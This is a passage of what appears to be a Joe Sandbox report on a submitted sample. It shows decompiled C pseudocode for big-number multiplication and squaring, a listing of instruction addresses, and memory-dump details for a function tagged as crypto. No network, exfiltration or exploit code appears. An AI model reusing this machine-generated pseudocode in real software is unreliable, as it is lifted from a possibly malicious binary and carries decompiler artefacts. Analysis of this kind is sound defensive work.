					_t440 = _t368 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t440;
				if( *(_t633 - 8) < _t440) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t594;
				if( *(_t633 - 0xc) < _t594) {
					_t368 = _t368 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t368;
				if( *(_t633 - 8) < _t368) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				_t526 =  *(_t331 + 4) & 0x0000ffff;
				_t595 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 6) & 0x0000ffff;
				_t370 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t596 = _t595 * _t526;
				 *(_t633 - 0x14) = _t526;
				_t371 = _t370 *  *(_t633 - 0x10);
				_t528 = _t370 *  *(_t633 - 0x14);
				_t443 = _t595 *  *(_t633 - 0x10) + _t528;
				if(_t443 < _t528) {
					_t371 = _t371 + 0x10000;
				}
				_t444 = _t443 << 0x10;
				_t597 = _t596 + _t444;
				_t372 = _t371 + (_t443 >> 0x10);
				if(_t597 < _t444) {
					_t372 = _t372 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t597;
				_t445 = _t372;
				if( *(_t633 - 0xc) < _t597) {
					_t445 = _t372 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t445;
				if( *(_t633 - 8) < _t445) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				_t447 =  *(_t633 - 0xc) + _t597;
				if(_t447 < _t597) {
					_t372 = _t372 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t372;
				if( *(_t633 - 8) < _t372) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) & 0x00000000;
				 *((intOrPtr*)( *(_t633 + 8) + 0x20)) = _t447;
				_t531 =  *(_t331 + 8) & 0x0000ffff;
				_t598 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0xa) & 0x0000ffff;
				_t375 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t599 = _t598 * _t531;
				 *(_t633 - 0x14) = _t531;
				_t376 = _t375 *  *(_t633 - 0x10);
				_t533 = _t375 *  *(_t633 - 0x14);
				_t450 = _t598 *  *(_t633 - 0x10) + _t533;
				if(_t450 < _t533) {
					_t376 = _t376 + 0x10000;
				}
				_t451 = _t450 << 0x10;
				_t600 = _t599 + _t451;
				_t377 = _t376 + (_t450 >> 0x10);
				if(_t600 < _t451) {
					_t377 = _t377 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t600;
				_t452 = _t377;
				if( *(_t633 - 8) < _t600) {
					_t452 = _t377 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t452;
				if( *(_t633 - 4) < _t452) {
					 *(_t633 - 0xc) = 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t600;
				if( *(_t633 - 8) < _t600) {
					_t377 = _t377 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t377;
				if( *(_t633 - 4) < _t377) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				_t536 =  *(_t331 + 0xc) & 0x0000ffff;
				_t601 =  *(_t331 + 0x18) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
				_t379 =  *(_t331 + 0x1a) & 0x0000ffff;
				_t602 = _t601 * _t536;
				 *(_t633 - 0x14) = _t536;
				_t380 = _t379 *  *(_t633 - 0x10);
				_t538 = _t379 *  *(_t633 - 0x14);
				_t455 = _t601 *  *(_t633 - 0x10) + _t538;
				if(_t455 < _t538) {
					_t380 = _t380 + 0x10000;
				}
				_t456 = _t455 << 0x10;
				_t603 = _t602 + _t456;
				_t381 = _t380 + (_t455 >> 0x10);
				if(_t603 < _t456) {
					_t381 = _t381 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t603;
				_t457 = _t381;
				if( *(_t633 - 8) < _t603) {
					_t457 = _t381 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t457;
				if( *(_t633 - 4) < _t457) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t603;
				if( *(_t633 - 8) < _t603) {
					_t381 = _t381 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t381;
				if( *(_t633 - 4) < _t381) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				_t541 =  *(_t331 + 0x10) & 0x0000ffff;
				_t604 =  *(_t331 + 0x14) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
				_t383 =  *(_t331 + 0x16) & 0x0000ffff;
				_t605 = _t604 * _t541;
				 *(_t633 - 0x14) = _t541;
				_t384 = _t383 *  *(_t633 - 0x10);
				_t543 = _t383 *  *(_t633 - 0x14);
				_t460 = _t604 *  *(_t633 - 0x10) + _t543;
				if(_t460 < _t543) {
					_t384 = _t384 + 0x10000;
				}
				_t461 = _t460 << 0x10;
				_t606 = _t605 + _t461;
				_t385 = _t384 + (_t460 >> 0x10);
				if(_t606 < _t461) {
					_t385 = _t385 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t606;
				_t462 = _t385;
				if( *(_t633 - 8) < _t606) {
					_t462 = _t385 + 1;
				}
				_t345 =  *(_t633 - 4) + _t462;
				if(_t345 < _t462) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				_t464 =  *(_t633 - 8) + _t606;
				if(_t464 < _t606) {
					_t385 = _t385 + 1;
				}
				_t346 = _t345 + _t385;
				if(_t346 < _t385) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) & 0x00000000;
				 *((intOrPtr*)( *(_t633 + 8) + 0x24)) = _t464;
				_t465 =  *(_t331 + 0x14);
				_t387 = _t465 & 0x0000ffff;
				_t466 = _t465 >> 0x10;
				_t608 = _t387 * _t466;
				_t609 = _t608 << 0x11;
				_t389 = _t387 * _t387 + _t609;
				_t468 = _t466 * _t466 + (_t608 >> 0xf);
				if(_t389 < _t609) {
					_t468 = _t468 + 1;
				}
				_t347 = _t346 + _t389;
				if(_t347 < _t389) {
					_t468 = _t468 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t468;
				if( *(_t633 - 0xc) < _t468) {
					 *(_t633 - 8) = 1;
				}
				_t548 =  *(_t331 + 0x10) & 0x0000ffff;
				_t610 =  *(_t331 + 0x18) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
				_t391 =  *(_t331 + 0x1a) & 0x0000ffff;
				_t611 = _t610 * _t548;
				 *(_t633 - 0x14) = _t548;
				_t392 = _t391 *  *(_t633 - 0x10);
				_t550 = _t391 *  *(_t633 - 0x14);
				_t471 = _t610 *  *(_t633 - 0x10) + _t550;
				if(_t471 < _t550) {
					_t392 = _t392 + 0x10000;
				}
				_t472 = _t471 << 0x10;
				_t612 = _t611 + _t472;
				_t393 = _t392 + (_t471 >> 0x10);
				if(_t612 < _t472) {
					_t393 = _t393 + 1;
				}
				_t348 = _t347 + _t612;
				_t473 = _t393;
				 *(_t633 - 4) = _t348;
				if(_t348 < _t612) {
					_t473 = _t393 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t473;
				if( *(_t633 - 0xc) < _t473) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t612;
				if( *(_t633 - 4) < _t612) {
					_t393 = _t393 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t393;
				if( *(_t633 - 0xc) < _t393) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				_t553 =  *(_t331 + 0xc) & 0x0000ffff;
				_t613 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
				_t395 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t614 = _t613 * _t553;
				 *(_t633 - 0x14) = _t553;
				_t396 = _t395 *  *(_t633 - 0x10);
				_t555 = _t395 *  *(_t633 - 0x14);
				_t476 = _t613 *  *(_t633 - 0x10) + _t555;
				if(_t476 < _t555) {
					_t396 = _t396 + 0x10000;
				}
				_t477 = _t476 << 0x10;
				_t615 = _t614 + _t477;
				_t397 = _t396 + (_t476 >> 0x10);
				if(_t615 < _t477) {
					_t397 = _t397 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t615;
				_t478 = _t397;
				if( *(_t633 - 4) < _t615) {
					_t478 = _t397 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t478;
				if( *(_t633 - 0xc) < _t478) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				_t480 =  *(_t633 - 4) + _t615;
				if(_t480 < _t615) {
					_t397 = _t397 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t397;
				if( *(_t633 - 0xc) < _t397) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) & 0x00000000;
				 *((intOrPtr*)( *(_t633 + 8) + 0x28)) = _t480;
				_t558 =  *(_t331 + 0x10) & 0x0000ffff;
				_t616 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
				_t400 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t617 = _t616 * _t558;
				 *(_t633 - 0x14) = _t558;
				_t401 = _t400 *  *(_t633 - 0x10);
				_t560 = _t400 *  *(_t633 - 0x14);
				_t483 = _t616 *  *(_t633 - 0x10) + _t560;
				if(_t483 < _t560) {
					_t401 = _t401 + 0x10000;
				}
				_t484 = _t483 << 0x10;
				_t618 = _t617 + _t484;
				_t402 = _t401 + (_t483 >> 0x10);
				if(_t618 < _t484) {
					_t402 = _t402 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t618;
				_t485 = _t402;
				if( *(_t633 - 0xc) < _t618) {
					_t485 = _t402 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t485;
				if( *(_t633 - 8) < _t485) {
					 *(_t633 - 4) = 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t618;
				if( *(_t633 - 0xc) < _t618) {
					_t402 = _t402 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t402;
				if( *(_t633 - 8) < _t402) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				_t563 =  *(_t331 + 0x14) & 0x0000ffff;
				_t619 =  *(_t331 + 0x18) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0x16) & 0x0000ffff;
				_t404 =  *(_t331 + 0x1a) & 0x0000ffff;
				_t620 = _t619 * _t563;
				 *(_t633 - 0x14) = _t563;
				_t405 = _t404 *  *(_t633 - 0x10);
				_t565 = _t404 *  *(_t633 - 0x14);
				_t488 = _t619 *  *(_t633 - 0x10) + _t565;
				if(_t488 < _t565) {
					_t405 = _t405 + 0x10000;
				}
				_t489 = _t488 << 0x10;
				_t621 = _t620 + _t489;
				_t406 = _t405 + (_t488 >> 0x10);
				if(_t621 < _t489) {
					_t406 = _t406 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t621;
				_t490 = _t406;
				if( *(_t633 - 0xc) < _t621) {
					_t490 = _t406 + 1;
				}
				_t350 =  *(_t633 - 8) + _t490;
				if(_t350 < _t490) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				_t492 =  *(_t633 - 0xc) + _t621;
				if(_t492 < _t621) {
					_t406 = _t406 + 1;
				}
				_t351 = _t350 + _t406;
				if(_t351 < _t406) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) & 0x00000000;
				 *((intOrPtr*)( *(_t633 + 8) + 0x2c)) = _t492;
				_t493 =  *(_t331 + 0x18);
				_t408 = _t493 & 0x0000ffff;
				_t494 = _t493 >> 0x10;
				_t623 = _t408 * _t494;
				_t624 = _t623 << 0x11;
				_t410 = _t408 * _t408 + _t624;
				_t496 = _t494 * _t494 + (_t623 >> 0xf);
				if(_t410 < _t624) {
					_t496 = _t496 + 1;
				}
				_t352 = _t351 + _t410;
				if(_t352 < _t410) {
					_t496 = _t496 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t496;
				if( *(_t633 - 4) < _t496) {
					 *(_t633 - 0xc) = 1;
				}
				_t570 =  *(_t331 + 0x14) & 0x0000ffff;
				_t625 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0x16) & 0x0000ffff;
				_t412 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t626 = _t625 * _t570;
				 *(_t633 - 0x14) = _t570;
				_t413 = _t412 *  *(_t633 - 0x10);
				_t572 = _t412 *  *(_t633 - 0x14);
				_t499 = _t625 *  *(_t633 - 0x10) + _t572;
				if(_t499 < _t572) {
					_t413 = _t413 + 0x10000;
				}
				_t500 = _t499 << 0x10;
				_t627 = _t626 + _t500;
				_t414 = _t413 + (_t499 >> 0x10);
				if(_t627 < _t500) {
					_t414 = _t414 + 1;
				}
				_t353 = _t352 + _t627;
				_t501 = _t414;
				 *(_t633 - 8) = _t353;
				if(_t353 < _t627) {
					_t501 = _t414 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t501;
				if( *(_t633 - 4) < _t501) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				_t503 =  *(_t633 - 8) + _t627;
				if(_t503 < _t627) {
					_t414 = _t414 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t414;
				if( *(_t633 - 4) < _t414) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				_t354 =  *(_t633 + 8);
				 *(_t633 - 8) =  *(_t633 - 8) & 0x00000000;
				 *((intOrPtr*)(_t354 + 0x30)) = _t503;
				_t575 =  *(_t331 + 0x18) & 0x0000ffff;
				_t628 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 + 8) =  *(_t331 + 0x1a) & 0x0000ffff;
				_t416 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t629 = _t628 * _t575;
				 *(_t633 - 0x14) = _t575;
				_t417 = _t416 *  *(_t633 + 8);
				_t577 = _t416 *  *(_t633 - 0x14);
				_t506 = _t628 *  *(_t633 + 8) + _t577;
				if(_t506 < _t577) {
					_t417 = _t417 + 0x10000;
				}
				_t507 = _t506 << 0x10;
				_t630 = _t629 + _t507;
				_t418 = _t417 + (_t506 >> 0x10);
				if(_t630 < _t507) {
					_t418 = _t418 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t630;
				 *(_t633 + 8) = _t418;
				_t508 = _t418;
				if( *(_t633 - 4) < _t630) {
					_t319 = _t418 + 1; // 0x1
					_t508 = _t319;
				}
				_t581 =  *(_t633 - 0xc) + _t508;
				if(_t581 < _t508) {
					 *(_t633 - 8) = 1;
				}
				_t510 =  *(_t633 - 4) + _t630;
				_t419 = _t418 + 1;
				if(_t419 >= 0) {
					_t419 =  *(_t633 + 8);
				}
				_t582 = _t581 + _t419;
				if(_t582 < _t419) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				 *((intOrPtr*)(_t354 + 0x34)) = _t510;
				_t332 =  *(_t331 + 0x1c);
				_t631 = _t332 & 0x0000ffff;
				_t333 = _t332 >> 0x10;
				_t512 = _t631 * _t333;
				_t422 = _t333 * _t333 + (_t512 >> 0xf);
				_t513 = _t512 << 0x11;
				_t338 = _t631 * _t631 + _t513;
				if(_t338 < _t513) {
					_t422 = _t422 + 1;
				}
				_t583 = _t582 + _t338;
				if(_t583 < _t338) {
					_t422 = _t422 + 1;
				}
				 *((intOrPtr*)(_t354 + 0x38)) = _t583;
				 *((intOrPtr*)(_t354 + 0x3c)) = _t422 +  *(_t633 - 8);
				return _t338;
			}
































































































































































































    0x003d9885
    0x003d9885
    0x003d9885
    0x003d9885
    0x003d988a
    0x003d988c
    0x003d988c
    0x003d9892
    0x003d9896
    0x003d9898
    0x003d9898
    0x003d989e
    0x003d98a2
    0x003d98a4
    0x003d98a4
    0x003d98a5
    0x003d98a9
    0x003d98ab
    0x003d98ab
    0x003d98b1
    0x003d98b5
    0x003d98b8
    0x003d98bb
    0x003d98be
    0x003d98c6
    0x003d98ce
    0x003d98d4
    0x003d98d6
    0x003d98da
    0x003d98dc
    0x003d98dc
    0x003d98dd
    0x003d98e1
    0x003d98e3
    0x003d98e3
    0x003d98e4
    0x003d98ea
    0x003d98ec
    0x003d98ec
    0x003d98f7
    0x003d98fb
    0x003d98ff
    0x003d9902
    0x003d9908
    0x003d990f
    0x003d9914
    0x003d9918
    0x003d991c
    0x003d9920
    0x003d9922
    0x003d9922
    0x003d992a
    0x003d9930
    0x003d9932
    0x003d9936
    0x003d9938
    0x003d9938
    0x003d9939
    0x003d993b
    0x003d993d
    0x003d9942
    0x003d9944
    0x003d9944
    0x003d9947
    0x003d994d
    0x003d994f
    0x003d994f
    0x003d9952
    0x003d9958
    0x003d995a
    0x003d995a
    0x003d995b
    0x003d9961
    0x003d9963
    0x003d9963
    0x003d996a
    0x003d996e
    0x003d9972
    0x003d9975
    0x003d997b
    0x003d9982
    0x003d9987
    0x003d998b
    0x003d998f
    0x003d9993
    0x003d9995
    0x003d9995
    0x003d999d
    0x003d99a3
    0x003d99a5
    0x003d99a9
    0x003d99ab
    0x003d99ab
    0x003d99ac
    0x003d99af
    0x003d99b4
    0x003d99b6
    0x003d99b6
    0x003d99b9
    0x003d99bf
    0x003d99c1
    0x003d99c1
    0x003d99c4
    0x003d99ca
    0x003d99cc
    0x003d99cc
    0x003d99cd
    0x003d99d3
    0x003d99d5
    0x003d99d5
    0x003d99dc
    0x003d99e0
    0x003d99e4
    0x003d99e7
    0x003d99ed
    0x003d99f4
    0x003d99f9
    0x003d99fd
    0x003d9a01
    0x003d9a05
    0x003d9a07
    0x003d9a07
    0x003d9a0f
    0x003d9a15
    0x003d9a17
    0x003d9a1b
    0x003d9a1d
    0x003d9a1d
    0x003d9a1e
    0x003d9a21
    0x003d9a26
    0x003d9a28
    0x003d9a28
    0x003d9a2b
    0x003d9a31
    0x003d9a33
    0x003d9a33
    0x003d9a39
    0x003d9a3d
    0x003d9a3f
    0x003d9a3f
    0x003d9a40
    0x003d9a46
    0x003d9a48
    0x003d9a48
    0x003d9a4e
    0x003d9a52
    0x003d9a59
    0x003d9a5d
    0x003d9a61
    0x003d9a64
    0x003d9a6a
    0x003d9a71
    0x003d9a76
    0x003d9a7a
    0x003d9a7e
    0x003d9a82
    0x003d9a84
    0x003d9a84
    0x003d9a8c
    0x003d9a92
    0x003d9a94
    0x003d9a98
    0x003d9a9a
    0x003d9a9a
    0x003d9a9b
    0x003d9a9e
    0x003d9aa3
    0x003d9aa5
    0x003d9aa5
    0x003d9aa8
    0x003d9aae
    0x003d9ab0
    0x003d9ab0
    0x003d9ab7
    0x003d9abd
    0x003d9abf
    0x003d9abf
    0x003d9ac0
    0x003d9ac6
    0x003d9ac8
    0x003d9ac8
    0x003d9acf
    0x003d9ad3
    0x003d9ad7
    0x003d9ada
    0x003d9ae0
    0x003d9ae7
    0x003d9aec
    0x003d9af0
    0x003d9af4
    0x003d9af8
    0x003d9afa
    0x003d9afa
    0x003d9b02
    0x003d9b08
    0x003d9b0a
    0x003d9b0e
    0x003d9b10
    0x003d9b10
    0x003d9b11
    0x003d9b14
    0x003d9b19
    0x003d9b1b
    0x003d9b1b
    0x003d9b1e
    0x003d9b24
    0x003d9b26
    0x003d9b26
    0x003d9b29
    0x003d9b2f
    0x003d9b31
    0x003d9b31
    0x003d9b32
    0x003d9b38
    0x003d9b3a
    0x003d9b3a
    0x003d9b41
    0x003d9b45
    0x003d9b49
    0x003d9b4c
    0x003d9b52
    0x003d9b59
    0x003d9b5e
    0x003d9b62
    0x003d9b66
    0x003d9b6a
    0x003d9b6c
    0x003d9b6c
    0x003d9b74
    0x003d9b7a
    0x003d9b7c
    0x003d9b80
    0x003d9b82
    0x003d9b82
    0x003d9b83
    0x003d9b86
    0x003d9b8b
    0x003d9b8d
    0x003d9b8d
    0x003d9b93
    0x003d9b97
    0x003d9b99
    0x003d9b99
    0x003d9b9f
    0x003d9ba3
    0x003d9ba5
    0x003d9ba5
    0x003d9ba6
    0x003d9baa
    0x003d9bac
    0x003d9bac
    0x003d9bb2
    0x003d9bb6
    0x003d9bb9
    0x003d9bbc
    0x003d9bbf
    0x003d9bc7
    0x003d9bcf
    0x003d9bd5
    0x003d9bd7
    0x003d9bdb
    0x003d9bdd
    0x003d9bdd
    0x003d9bde
    0x003d9be2
    0x003d9be4
    0x003d9be4
    0x003d9be5
    0x003d9beb
    0x003d9bed
    0x003d9bed
    0x003d9bf8
    0x003d9bfc
    0x003d9c00
    0x003d9c03
    0x003d9c09
    0x003d9c10
    0x003d9c15
    0x003d9c19
    0x003d9c1d
    0x003d9c21
    0x003d9c23
    0x003d9c23
    0x003d9c2b
    0x003d9c31
    0x003d9c33
    0x003d9c37
    0x003d9c39
    0x003d9c39
    0x003d9c3a
    0x003d9c3c
    0x003d9c3e
    0x003d9c43
    0x003d9c45
    0x003d9c45
    0x003d9c48
    0x003d9c4e
    0x003d9c50
    0x003d9c50
    0x003d9c53
    0x003d9c59
    0x003d9c5b
    0x003d9c5b
    0x003d9c5c
    0x003d9c62
    0x003d9c64
    0x003d9c64
    0x003d9c6b
    0x003d9c6f
    0x003d9c73
    0x003d9c76
    0x003d9c7c
    0x003d9c83
    0x003d9c88
    0x003d9c8c
    0x003d9c90
    0x003d9c94
    0x003d9c96
    0x003d9c96
    0x003d9c9e
    0x003d9ca4
    0x003d9ca6
    0x003d9caa
    0x003d9cac
    0x003d9cac
    0x003d9cad
    0x003d9cb0
    0x003d9cb5
    0x003d9cb7
    0x003d9cb7
    0x003d9cba
    0x003d9cc0
    0x003d9cc2
    0x003d9cc2
    0x003d9cc8
    0x003d9ccc
    0x003d9cce
    0x003d9cce
    0x003d9ccf
    0x003d9cd5
    0x003d9cd7
    0x003d9cd7
    0x003d9cdd
    0x003d9ce1
    0x003d9ce8
    0x003d9cec
    0x003d9cf0
    0x003d9cf3
    0x003d9cf9
    0x003d9d00
    0x003d9d05
    0x003d9d09
    0x003d9d0d
    0x003d9d11
    0x003d9d13
    0x003d9d13
    0x003d9d1b
    0x003d9d21
    0x003d9d23
    0x003d9d27
    0x003d9d29
    0x003d9d29
    0x003d9d2a
    0x003d9d2d
    0x003d9d32
    0x003d9d34
    0x003d9d34
    0x003d9d37
    0x003d9d3d
    0x003d9d3f
    0x003d9d3f
    0x003d9d46
    0x003d9d4c
    0x003d9d4e
    0x003d9d4e
    0x003d9d4f
    0x003d9d55
    0x003d9d57
    0x003d9d57
    0x003d9d5e
    0x003d9d62
    0x003d9d66
    0x003d9d69
    0x003d9d6f
    0x003d9d76
    0x003d9d7b
    0x003d9d7f
    0x003d9d83
    0x003d9d87
    0x003d9d89
    0x003d9d89
    0x003d9d91
    0x003d9d97
    0x003d9d99
    0x003d9d9d
    0x003d9d9f
    0x003d9d9f
    0x003d9da0
    0x003d9da3
    0x003d9da8
    0x003d9daa
    0x003d9daa
    0x003d9db0
    0x003d9db4
    0x003d9db6
    0x003d9db6
    0x003d9dbc
    0x003d9dc0
    0x003d9dc2
    0x003d9dc2
    0x003d9dc3
    0x003d9dc7
    0x003d9dc9
    0x003d9dc9
    0x003d9dcf
    0x003d9dd3
    0x003d9dd6
    0x003d9dd9
    0x003d9ddc
    0x003d9de4
    0x003d9dec
    0x003d9df2
    0x003d9df4
    0x003d9df8
    0x003d9dfa
    0x003d9dfa
    0x003d9dfb
    0x003d9dff
    0x003d9e01
    0x003d9e01
    0x003d9e02
    0x003d9e08
    0x003d9e0a
    0x003d9e0a
    0x003d9e15
    0x003d9e19
    0x003d9e1d
    0x003d9e20
    0x003d9e26
    0x003d9e2d
    0x003d9e32
    0x003d9e36
    0x003d9e3a
    0x003d9e3e
    0x003d9e40
    0x003d9e40
    0x003d9e48
    0x003d9e4e
    0x003d9e50
    0x003d9e54
    0x003d9e56
    0x003d9e56
    0x003d9e57
    0x003d9e59
    0x003d9e5b
    0x003d9e60
    0x003d9e62
    0x003d9e62
    0x003d9e65
    0x003d9e6b
    0x003d9e6d
    0x003d9e6d
    0x003d9e73
    0x003d9e77
    0x003d9e79
    0x003d9e79
    0x003d9e7a
    0x003d9e80
    0x003d9e82
    0x003d9e82
    0x003d9e85
    0x003d9e88
    0x003d9e8c
    0x003d9e93
    0x003d9e97
    0x003d9e9b
    0x003d9e9e
    0x003d9ea4
    0x003d9eab
    0x003d9eb0
    0x003d9eb4
    0x003d9eb8
    0x003d9ebc
    0x003d9ebe
    0x003d9ebe
    0x003d9ec6
    0x003d9ecc
    0x003d9ece
    0x003d9ed2
    0x003d9ed4
    0x003d9ed4
    0x003d9ed5
    0x003d9ed8
    0x003d9edb
    0x003d9ee0
    0x003d9ee2
    0x003d9ee2
    0x003d9ee2
    0x003d9ee8
    0x003d9eec
    0x003d9eee
    0x003d9eee
    0x003d9ef8
    0x003d9efc
    0x003d9efd
    0x003d9eff
    0x003d9eff
    0x003d9f02
    0x003d9f06
    0x003d9f08
    0x003d9f08
    0x003d9f0b
    0x003d9f0e
    0x003d9f11
    0x003d9f14
    0x003d9f1e
    0x003d9f26
    0x003d9f2d
    0x003d9f30
    0x003d9f34
    0x003d9f36
    0x003d9f36
    0x003d9f37
    0x003d9f3b
    0x003d9f3d
    0x003d9f3d
    0x003d9f41
    0x003d9f46
    0x003d9f4b

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D8A1C, Relevance: .6, Instructions: 568Crypto
    C-Code - Quality: 100%
    			E003D8A1C(signed short* __eax, signed short* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed short* _t258;
				unsigned int _t261;
				signed int _t262;
				intOrPtr _t263;
				signed int _t264;
				signed int _t268;
				unsigned int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t277;
				signed int _t279;
				signed int _t281;
				signed int _t283;
				signed int _t285;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				signed int _t297;
				signed int _t299;
				signed short* _t300;
				signed int _t301;
				signed int _t302;
				void* _t303;
				signed int _t306;
				signed int _t307;
				intOrPtr _t308;
				signed int _t309;
				signed int _t310;
				void* _t311;
				signed int _t315;
				signed int _t316;
				intOrPtr _t318;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				signed int _t332;
				signed int _t333;
				intOrPtr _t335;
				signed int _t339;
				signed int _t340;
				signed int _t344;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int _t361;
				signed int _t362;
				signed int _t366;
				signed int _t367;
				signed int _t371;
				signed int _t372;
				intOrPtr _t374;
				signed int _t378;
				signed int _t379;
				signed int _t383;
				signed int _t384;
				intOrPtr _t386;
				signed int _t387;
				signed int _t388;
				void* _t389;
				signed int _t390;
				signed int _t398;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				signed int _t406;
				signed int _t409;
				void* _t413;
				signed int _t414;
				signed int _t417;
				void* _t421;
				signed int _t422;
				signed int _t425;
				void* _t429;
				signed int _t430;
				signed int _t433;
				void* _t437;
				signed int _t438;
				signed int _t441;
				void* _t445;
				signed int _t446;
				signed int _t449;
				void* _t453;
				signed int _t454;
				signed int _t457;
				void* _t461;
				signed int _t462;
				signed int _t465;
				void* _t469;
				signed int _t470;
				signed int _t473;
				void* _t477;
				signed int _t478;
				signed int _t481;
				void* _t485;
				signed int _t486;
				signed int _t489;
				void* _t493;
				signed int _t494;
				signed int _t497;
				void* _t501;
				signed int _t502;
				unsigned int _t505;
				signed int _t506;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t514;
				void* _t518;
				signed int _t520;
				signed int _t522;
				signed int _t523;
				void* _t524;
				signed int _t525;
				signed int _t526;
				void* _t527;
				signed int _t528;
				signed int _t529;
				void* _t530;
				signed int _t532;
				signed int _t533;
				void* _t534;
				signed int _t535;
				signed int _t536;
				void* _t537;
				signed int _t538;
				signed int _t539;
				void* _t540;
				signed int _t541;
				signed int _t542;
				void* _t543;
				signed int _t545;
				signed int _t546;
				void* _t547;
				signed int _t548;
				signed int _t549;
				void* _t550;
				signed int _t551;
				signed int _t552;
				void* _t553;
				signed int _t555;
				signed int _t556;
				void* _t557;
				signed int _t558;
				signed int _t559;
				void* _t560;
				signed int _t563;
				intOrPtr _t567;

				_t300 = __ecx;
				_t258 = __eax;
				_t264 =  *__eax & 0x0000ffff;
